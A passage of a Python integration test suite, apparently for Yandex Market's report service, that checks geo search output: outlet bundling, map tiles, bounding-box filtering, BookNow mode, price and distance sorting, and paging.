фильтров\n # Оффер good21 доступен в трех аутлетах (\"bundleCount\": 3)\n # В аутлете 211 доступны два оффера (\"bundleCount\": 2)\n response = self.report.request_json('place=geo&hid=501&rids=0&show-urls=geo,geoOutlet,geoPointInfo')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good21\"},\n \"bundleCount\": 2,\n \"bundled\": {\"outletId\": 221, \"count\": 2},\n \"outlet\": {\n \"entity\": \"outlet\",\n \"id\": \"221\",\n \"name\": \"OUTLET-102-221\",\n \"type\": \"store\",\n \"email\": \"\",\n \"shop\": {\"id\": 102},\n \"address\": {\"locality\": \"\", \"street\": \"\", \"building\": \"\", \"block\": \"\", \"note\": \"\"},\n \"region\": {\n \"entity\": \"region\",\n \"id\": 1,\n \"name\": u\"Город\",\n \"lingua\": {\"name\": {\"genitive\": u\"Город\", \"preposition\": \" \", \"prepositional\": u\"Город\"}},\n },\n \"gpsCoord\": {\"longitude\": \"37.1\", \"latitude\": \"55.5\"},\n \"bundleCount\": 3,\n \"bundled\": {\"count\": 3},\n },\n 'vendor': {\n 'name': 'samsung',\n 'website': 'www.samsung.com',\n \"description\": \"VendorDescription\",\n \"logo\": {\n \"entity\": \"picture\",\n \"url\": \"//mdata.yandex.net/i?path=b0726220734_img_id5949902134120952009.png\",\n },\n \"webpageRecommendedShops\": \"http://www.samsung.com/ru/brandshops/\",\n },\n },\n preserve_order=True,\n )\n\n # Проверяем наличие записей в логах\n self.click_log.expect(ClickType.GEO, url_type=UrlType.GEO, shop_id=102, dtype='cpa', type_id=3)\n self.click_log.expect(ClickType.GEO_OUTLET, url_type=UrlType.GEO_OUTLET, shop_id=102)\n self.click_log.expect(ClickType.GEO_OUTLET_INFO, url_type=UrlType.GEO_OUTLET_INFO, shop_id=102)\n self.show_log.expect(url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg', url_type=UrlType.GEO)\n self.show_log.expect(\n url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221',\n url_type=UrlType.GEO_OUTLET,\n )\n self.show_log.expect(\n url='//market.yandex.ru/gate/maps/getpointinfo.xml?offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221',\n url_type=UrlType.GEO_OUTLET_INFO,\n )\n\n def test_show_offer_param(self):\n # Что тестируем: работу cgi-параметра &show-offer\n\n # Поведение по умолчанию - показ и офферов и тайлов\n response = self.report.request_json('place=geo&hyperid=301&tile=619,321&zoom=10&rids=0')\n self.assertFragmentIn(response, {\"results\": [], \"tiles\": []}, preserve_order=True)\n\n # Показ только офферов\n response = self.report.request_json('place=geo&show-outlet=offers&hyperid=301&rids=0')\n self.assertFragmentIn(response, {\"results\": []}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"tiles\": []}, preserve_order=True)\n\n # Показ только тайлов\n response = self.report.request_json('place=geo&show-outlet=tiles&tile=619,321&zoom=10&hyperid=301&rids=0')\n self.assertFragmentIn(response, {\"tiles\": []}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"results\": []}, preserve_order=True)\n\n def test_geo_bounding_small(self):\n # Что тестируем: выдачу с учетом баундинга в маленьком квадрате в двух вариантах:\n # с дефолтным ранжированием и с ранжированием по удаленности\n # В выдаче должны остаться аутлеты 211 и 231 (см \"карту\")\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good12\"},\n \"bundleCount\": 4,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 4},\n \"outlet\": {\"id\": \"211\", \"bundleCount\": 6, \"bundled\": {\"modelId\": 301, \"count\": 6}},\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"outletId\": 261, \"count\": 1},\n \"outlet\": {\n \"id\": \"261\",\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 3},\n \"outlet\": {\"id\": \"231\", \"bundleCount\": 3, \"bundled\": {\"modelId\": 301, \"count\": 3}},\n },\n ],\n preserve_order=True,\n )\n\n # Что тестируем: выдача не меняется при regset=1:\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=1®set=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n\n # escaped geo coordinates MARKETOUT-27050\n response = self.report.request_json(\n 'place=geo&geo-location=37.15%252C55.15&geo_bounds_lb=37.0%252C55.0&geo_bounds_rt=37.2%252C55.2&hyperid=301&rids=1®set=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n\n response = self.report.request_json(\n 'place=geo&how=distance&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&touch=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 3},\n \"outlet\": {\"id\": \"231\", \"bundleCount\": 3, \"bundled\": {\"modelId\": 301, \"count\": 3}},\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good12\"},\n \"bundleCount\": 4,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 4},\n \"outlet\": {\"id\": \"211\", \"bundleCount\": 6, \"bundled\": {\"modelId\": 301, \"count\": 6}},\n },\n ],\n preserve_order=True,\n )\n\n def test_geo_bounding_large(self):\n # Что тестируем: выдачу с учетом баундинга в большом квадрате в двух вариантах:\n # с дефолтным ранжированием и с ранжированием по удаленности\n # В выдаче должны остаться аутлеты 211-214 и 231-233 (см \"карту\") и 261,262(Постаматы)\n # Дефолтное значение geo-sort-gran = 2 (т.е. по два аутлета от магазина подряд)\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 9, \"shops\": 3, \"shopOutlets\": 9}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"261\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"262\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"233\"}},\n ],\n preserve_order=True,\n )\n\n response = self.report.request_json(\n 'place=geo&how=distance&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&hyperid=301&rids=0&touch=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 9, \"shops\": 3, \"shopOutlets\": 9}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"233\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_bounding_empty(self):\n # Что тестируем: выдачу с учетом баундинга пустом квадрате\n response = self.report.request_json(\n 'place=geo&how=distance&geo-location=37.15,55.65&geo_bounds_lb=37.0,55.6&geo_bounds_rt=37.2,55.8&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 0, \"shops\": 0, \"shopOutlets\": 0}}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"entity\": \"offer\"}, preserve_order=True)\n\n def test_tile_format(self):\n # Что тестируем: формат выдачи тайла\n response = self.report.request_json('place=geo&tile=619,321&zoom=10&hyperid=301&show-outlet=tiles&rids=0')\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\n \"entity\": \"tile\",\n \"coord\": {\"x\": 619, \"y\": 321, \"zoom\": 10},\n \"outlets\": [\n {\n \"entity\": \"outlet\",\n \"id\": \"216\",\n \"type\": \"pickup\",\n \"gpsCoord\": {\"longitude\": \"37.7\", \"latitude\": \"55.7\"},\n }\n ],\n }\n ]\n },\n preserve_order=True,\n )\n\n def test_multiple_tiles(self):\n # Что тестируем: выдачу аутлетов в группе тайлов\n response = self.report.request_json(\n 'place=geo&tile=617,322&tile=617,323&tile=617,324&zoom=10&hyperid=301&show-outlet=tiles&rids=0'\n )\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\"coord\": {\"x\": 617, \"y\": 322}, \"outlets\": [{\"id\": \"221\"}]},\n {\"coord\": {\"x\": 617, \"y\": 323}, \"outlets\": [{\"id\": \"212\"}, {\"id\": \"232\"}]},\n {\"coord\": {\"x\": 617, \"y\": 324}, \"outlets\": [{\"id\": \"211\"}, {\"id\": \"231\"}, {\"id\": \"261\"}]},\n ]\n },\n preserve_order=True,\n )\n\n def test_empty_tile(self):\n # Что тестируем: выдачу пустого тайла\n response = self.report.request_json('place=geo&tile=617,321&zoom=10&hyperid=301&show-outlet=tiles&rids=0')\n self.assertFragmentIn(\n response, {\"tiles\": [{\"coord\": {\"x\": 617, \"y\": 321, \"zoom\": 10}, \"outlets\": []}]}, preserve_order=True\n )\n self.assertFragmentNotIn(response, {\"outlets\": [{\"entity\": \"outlet\"}]}, preserve_order=True)\n\n def test_total_renderable(self):\n \"\"\"Проверяется, что общее количество для показа = total\"\"\"\n request = 'place=geo&show-book-now-only=1&point_id=211&hyperid=301&rids=0&grhow=offer'\n response = self.report.request_json(request)\n self.assertFragmentIn(response, {\"total\": 3})\n self.assertEqual(3, response.count({\"entity\": \"offer\"}))\n response = self.report.request_json(request + '&numdoc=1')\n self.assertFragmentIn(response, {\"total\": 3})\n self.assertEqual(1, response.count({\"entity\": \"offer\"}))\n self.access_log.expect(total_renderable='3').times(2)\n\n def test_is_main(self):\n # Что тестируем: признак is-main в аутлете. Is-main аутлеты должны располагаться выше не-is-main\n response = self.report.request_json('place=geo&hyperid=302&rids=0')\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"254\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"251\"}},\n ],\n preserve_order=True,\n )\n\n def test_pickup_price(self):\n # Что тестируем: признак pickup-price в аутлете. Аутлеты ранжируются по возрастанию цены и\n # возрастанию расстояния до пользователя в случае равенства цен\n unified_off_flags = '&rearr-factors=market_dsbs_tariffs=0;market_unified_tariffs=0'\n response = self.report.request_json('place=geo&geo-location=37.15,55.15&hyperid=302&rids=0' + unified_off_flags)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"252\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"253\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"251\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"254\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_output_format_book_now(self):\n # Что тестируем: формат выдаче аутлета в BookNow-выдаче (show-book-now-only=1)\n response = self.report.request_json(\n 'place=geo&hyperid=301&show-book-now-only=1&rids=0&show-urls=geo,geoOutlet,geoPointInfo'\n )\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good21\"},\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"outletId\": 221, \"count\": 1},\n \"outlet\": {\n \"entity\": \"outlet\",\n \"id\": \"221\",\n \"name\": \"OUTLET-102-221\",\n \"type\": \"store\",\n \"email\": \"\",\n \"shop\": {\"id\": 102},\n \"address\": {\"locality\": \"\", \"street\": \"\", \"building\": \"\", \"block\": \"\", \"note\": \"\"},\n \"region\": {\n \"entity\": \"region\",\n \"id\": 1,\n \"name\": u\"Город\",\n \"lingua\": {\"name\": {\"genitive\": u\"Город\", \"preposition\": \" \", \"prepositional\": u\"Город\"}},\n },\n \"gpsCoord\": {\"longitude\": \"37.1\", \"latitude\": \"55.5\"},\n \"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"count\": 2},\n },\n },\n preserve_order=True,\n )\n\n # Проверяем наличие записей в логах\n self.click_log.expect(ClickType.GEO, shop_id=102)\n self.click_log.expect(ClickType.GEO_OUTLET, shop_id=102)\n self.click_log.expect(ClickType.GEO_OUTLET_INFO, shop_id=102)\n self.show_log.expect(url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg')\n self.show_log.expect(url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221')\n self.show_log.expect(\n url='//market.yandex.ru/gate/maps/getpointinfo.xml?offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221'\n )\n\n def test_geo_output_sorting_book_now(self):\n # Что тестируем: дефолтное ранжирование аутлетов в рамках BookNow с geo-sort-gran=1\n # Также тестируем пейджинг\n # См. описание https://wiki.yandex-team.ru/market/projects/multiregion/projects/pickupinstore/dev/report/geo-response/#ranzhirovanietovarovnakarte\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&page=2&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&page=3&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=3&page=4&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_output_distance_sorting_book_now(self):\n # Что тестируем: ранжирование аутлетов по расстоянию до пользователя в рамках BookNow с geo-sort-gran=1\n # Также тестируем пейджинг\n # См. описание https://wiki.yandex-team.ru/market/projects/multiregion/projects/pickupinstore/dev/report/geo-response/#ranzhirovanietovarovnakarte\n response = self.report.request_json(\n 'place=geo&how=distance&numdoc=4&geo-location=37.15,55.15&show-book-now-only=1&geo-sort-gran=1&numdoc=20&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&how=distance&page=2&numdoc=4&geo-location=37.15,55.15&show-book-now-only=1&geo-sort-gran=1&numdoc=20&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n ],\n preserve_order=True,\n )\n response = self.report.request_json(\n 'place=geo&how=distance&page=3&numdoc=4&geo-location=37.15,55.15&show-book-now-only=1&geo-sort-gran=1&numdoc=20&hyperid=301&rids=0'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_geo_bounding_booknow(self):\n # Что тестируем: выдачу с учетом баундинга с дефолтным ранжированием и с ранжированием по удаленности\n # В выдаче должны остаться аутлеты 211 и 231 (см \"карту\")\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 2, \"shops\": 2, \"shopOutlets\": 2}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good13\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 3},\n \"outlet\": {\"id\": \"211\", \"bundleCount\": 2, \"bundled\": {\"modelId\": 301, \"count\": 2}},\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n \"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 2},\n \"outlet\": {\n \"id\": \"231\",\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"count\": 1},\n },\n },\n ],\n preserve_order=True,\n )\n\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&how=distance&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 2, \"shops\": 2, \"shopOutlets\": 2}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good31\"},\n \"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 2},\n \"outlet\": {\n \"id\": \"231\",\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"count\": 1},\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good13\"},\n \"bundleCount\": 3,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 3},\n \"outlet\": {\n \"id\": \"211\",\n \"bundleCount\": 2,\n \"bundled\": {\"modelId\": 301, \"count\": 2},\n },\n },\n ],\n preserve_order=True,\n )\n\n def test_multiple_tiles_booknow(self):\n # Что тестируем: выдачу аутлетов в группе тайлов в BookNow выдаче\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&tile=617,322&tile=618,322&tile=619,322&zoom=10&hyperid=301&show-outlet=tiles&rids=0'\n )\n self.assertFragmentIn(\n response,\n {\n \"tiles\": [\n {\"coord\": {\"x\": 617, \"y\": 322}, \"outlets\": [{\"id\": \"221\"}]},\n {\"coord\": {\"x\": 618, \"y\": 322}, \"outlets\": [{\"id\": \"215\"}, {\"id\": \"222\"}]},\n {\"coord\": {\"x\": 619, \"y\": 322}, \"outlets\": []},\n ]\n },\n preserve_order=True,\n )\n\n def test_single_outlet_booknow(self):\n # Что тестируем: режим выдачи для одного аутлета, сразу с BookNow\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&point_id=211&hyperid=301&rids=0&grhow=offer'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 1, \"shopOutlets\": 1}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"211\"}},\n ],\n preserve_order=True,\n )\n\n def test_top5_geo(self):\n # Что тестируем: режим выдачи Топ5-гео, сразу с BookNow\n response = self.report.request_json(\n 'place=geo&show-book-now-only=1&numdoc=5&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.4,55.4&geo-sort-gran=1&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 7, \"shops\": 2, \"shopOutlets\": 7}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_aprice(self):\n # Что тестируем: сортировку по возрастанию цены\n response = self.report.request_json(\n 'place=geo&how=aprice&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 15, \"shops\": 5, \"shopOutlets\": 15}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good22\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good22\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good33\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good33\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good41\"}, \"outlet\": {\"id\": \"241\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"261\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"262\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good22\"}, \"outlet\": {\"id\": \"223\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good33\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good14\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_aprice_booknow(self):\n # Что тестируем: сортировку по возрастанию цены в BookNow-выдаче\n response = self.report.request_json(\n 'place=geo&how=aprice&show-book-now-only=1&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 11, \"shops\": 3, \"shopOutlets\": 11}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good13\"}, \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"213\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good32\"}, \"outlet\": {\"id\": \"233\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"215\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good11\"}, \"outlet\": {\"id\": \"216\"}},\n ],\n preserve_order=True,\n )\n\n def test_sorting_dprice(self):\n # Что тестируем: сортировку по убыванию цены\n response = self.report.request_json(\n 'place=geo&how=dprice&geo-location=37.15,55.15&geo-sort-gran=2&numdoc=20&hyperid=301&rids=0&pp=18'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 15, \"shops\": 5, \"shopOutlets\": 15}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"211\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"221\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good21\"}, \"outlet\": {\"id\": \"222\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"231\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good31\"}, \"outlet\": {\"id\": \"232\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good41\"}, \"outlet\": {\"id\": \"241\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"261\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good_PostTerm_6\"}, \"outlet\": {\"id\": \"262\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"good12\"}, \"outlet\": {\"id\": 